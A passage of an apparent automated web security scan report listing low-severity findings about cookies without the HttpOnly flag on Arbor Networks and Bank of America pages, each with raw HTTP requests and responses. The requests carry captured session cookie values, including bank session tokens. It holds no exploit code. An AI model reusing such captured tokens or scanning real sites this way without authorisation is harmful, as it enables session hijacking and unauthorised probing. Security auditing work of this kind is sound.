Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=b1cd9acc8320405ae0ba3cb0a133c3f9; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:51 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:51 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:02:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:53 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.365. https://www.arbornetworks.com/en/lost-password-3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/lost-password-3.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/lost-password-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=2893ab73ba553c847b7da80617b1ab85; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:58 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:58 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:02:59 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.366. https://www.arbornetworks.com/en/partner-portal-home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/partner-portal-home.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/partner-portal-home.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 301 Moved Permanently
Date: Thu, 03 Feb 2011 00:03:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=9c51d9603ee1d47f45aa486fea079d63; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:03:02 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:03:02 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:03:03 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:03:03 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: index.php
Content-Length: 0
Connection: close
Content-Type: text/html


11.367. https://www.arbornetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=731c462d215cdaa4529663bbfc9a90f0; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:04 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:04 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:01:05 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:05 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.368. https://www.arbornetworks.com/register.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /register.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /register.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:03:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=9ae3012ff98a9b748ae7ee23a2c25a2b; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:03:08 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:03:08 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:03:09 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:03:32 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerLogi
...[SNIP]...

11.369. http://www.bankofamerica.com/adtrack/index.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /adtrack/index.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adtrack/index.cgi?adlink=000309029q890000g161 HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:30 GMT
Content-length: 0
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-cookie: TRACKING_CODE=000309029q890000g161; path=/; expires=Monday, 01-Aug-2011 23:59:59 GMT
Set-cookie: PROMO=000309029q890000g161; path=/;
Location: https://www.bankofamerica.com/ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161
Connection: close
Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/


11.370. http://www.bankofamerica.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /careers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:06:00 GMT
Content-type: magnus-internal/cold-fusion
Location: http://careers.bankofamerica.com
Connection: close
Set-Cookie: BIGipServerngen-www.80=3871717035.20480.0000; path=/


11.371. http://www.bankofamerica.com/coremetrics/cmdatatagutils.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /coremetrics/cmdatatagutils.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coremetrics/cmdatatagutils.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:14:55 GMT
Content-length: 25169
Content-type: application/x-javascript
Last-modified: Sat, 04 Dec 2010 00:55:33 GMT
Etag: "6251-4cf99185"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=2865084075.20480.0000; path=/

/* cmdatatagutils.js
* $Id: cmdatatagutils-Comprehensive-Condensed-master.txt 158951 2010-10-26 18:29:42Z cterrell $
*
* Coremetrics Tag v4.0, 8/11/2006
* COPYRIGHT . 1999-2010 COREMETRICS, AN IBM COM
...[SNIP]...

11.372. http://www.bankofamerica.com/coremetrics/v40/eluminate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /coremetrics/v40/eluminate.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coremetrics/v40/eluminate.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:14:52 GMT
Content-length: 26681
Content-type: application/x-javascript
Last-modified: Sat, 04 Dec 2010 00:55:33 GMT
Etag: "6839-4cf99185"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1657190059.20480.0000; path=/

/*$Id: eluminate-Comprehensive-Condensed-master.txt 158951 2010-10-26 18:29:42Z cterrell $*/if(!cGB){var cGB=true;if(!cm_ClientID){var cm_ClientID="60010394";}if(!cm_HOST){var cm_HOST="testdata.coreme
...[SNIP]...

11.373. http://www.bankofamerica.com/creditcards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /creditcards/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /creditcards/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 301 Moved permanently
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:50 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Location: https://www4.bankofamerica.com/credit-cards/cardoverview.action?context_id=overview_page
Page-Completion-Status: Normal
Set-Cookie: TRACKING_CODE=; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/


       <!--i2a business unit tracking code-->
       <script LANGUAGE="JavaScript" type="text/javascript">
       var ic_bu = "credit+cards";
       </script>


       <!--i2a credit card application start code-->

...[SNIP]...

11.374. http://www.bankofamerica.com/creditcards/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /creditcards/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/index.cfm?template=manage_card&RequestTimeout=120 HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:51 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CCPATH=Affiliate; path=/; domain=.bankofamerica.com;
Set-Cookie: CONTEXT=; expires=Tue, 04-Jan-2011 01:05:49 GMT; path=/;
Set-Cookie: TRACKING_CODE=; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=3167139499.20480.0000; path=/


                                                                                                                                                                   <style>

.page-title_1 {
color:#D4001A;
font-size:145%;
fo
...[SNIP]...

11.375. http://www.bankofamerica.com/deposits/checksave/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /deposits/checksave/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:31 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/deposits/checksave/index.cfm?template=overview&context=en_US&ch_bag=&sa_bag=&cd_bag=
Connection: close
Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/


11.376. http://www.bankofamerica.com/deposits/checksave/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /deposits/checksave/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:36 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/deposits/checksave/index.cfm?template=overview&context=en_US&ch_bag=&sa_bag=&cd_bag=
Connection: close
Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/


11.377. http://www.bankofamerica.com/feesandprocesses/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /feesandprocesses/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feesandprocesses/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; 